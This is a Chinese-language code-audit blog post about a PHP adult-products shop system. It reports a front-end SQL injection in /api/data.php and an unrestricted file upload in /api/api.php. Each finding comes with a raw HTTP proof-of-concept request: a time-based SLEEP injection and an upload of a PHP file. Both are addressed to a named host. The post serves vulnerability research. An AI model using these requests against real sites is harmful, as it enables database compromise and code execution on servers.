PHP代码审计：某成人用品商城系统前台SQL注入&前台任意文件上传

要教会阅读：912 2025-06-25 08:04:21 评论：0

项目介绍

环境搭建

源码获取见文末

源码下载到本地，采用小皮面板搭建

修改数据库配置文件：www/Mao/common.php

创建对应数据库导入执行sql文件导入数据，utf8，utf8-bin

配置完成后直接访问即可

代码审计

项目分析

自研系统，有点眼熟忘记是哪套开发的了，这套源码有问题，前台用户和后台登录不了代码有问题，要教会平台修复一会还有问题，懒得修了，直接前台得了

鉴权代码

上工具

前台SQL注入

搜索query(，发现执行方法有封装的

那就一个个搜了

对应文件：/api/data.php

148行执行sql语句，语句中拼接了$sql，$sql在第146行定义，拼接了$search，$search在第133行通过get获取，过程中没有转义和过滤，封装函数也没发现过滤实现，存在注入

测试poc：

POST /api/data.php?mod=list&lx=2&search=caigo%27+AND+%28SELECT+7982+FROM+%28SELECT%28SLEEP%285%29%29%29BnbO%29+AND+%27caigo%27%3D%27caigo HTTP/1.1
Host: www.yaojiaohui.net/cryp
Accept: text/html, */*; q=0.01
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Origin: http://www.yaojiaohui.net/cryp
Referer: http://www.yaojiaohui.net/cryp/list.php
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Accept-Language: zh-CN,zh;q=0.9
Content-Length: 0

前台任意文件上传

搜索move_uploaded_file

对应文件：/api/api.php

可以看到，这里从接收文件到使用move_uploaded_file上传，过程中只有文件大小和MIME检测，没有对我们上传的文件后缀进行检测，存在任意文件上传

测试poc：

POST /api/api.php?mod=upload&type=1 HTTP/1.1
Host: www.yaojiaohui.net/cryp
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type:multipart/form-data;boundary=-----------------------------7db372eb000e2
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Referer: http://www.yaojiaohui.net/cryp/login.php?mod=2
X-Requested-With: XMLHttpRequest
Origin: http://www.yaojiaohui.net/cryp
Content-Length: 206
-------------------------------7db372eb000e2
Content-Disposition: form-data; name="file"; filename="caigo.php"
Content-Type: image/jpeg
<?php phpinfo();?>
-------------------------------7db372eb000e2--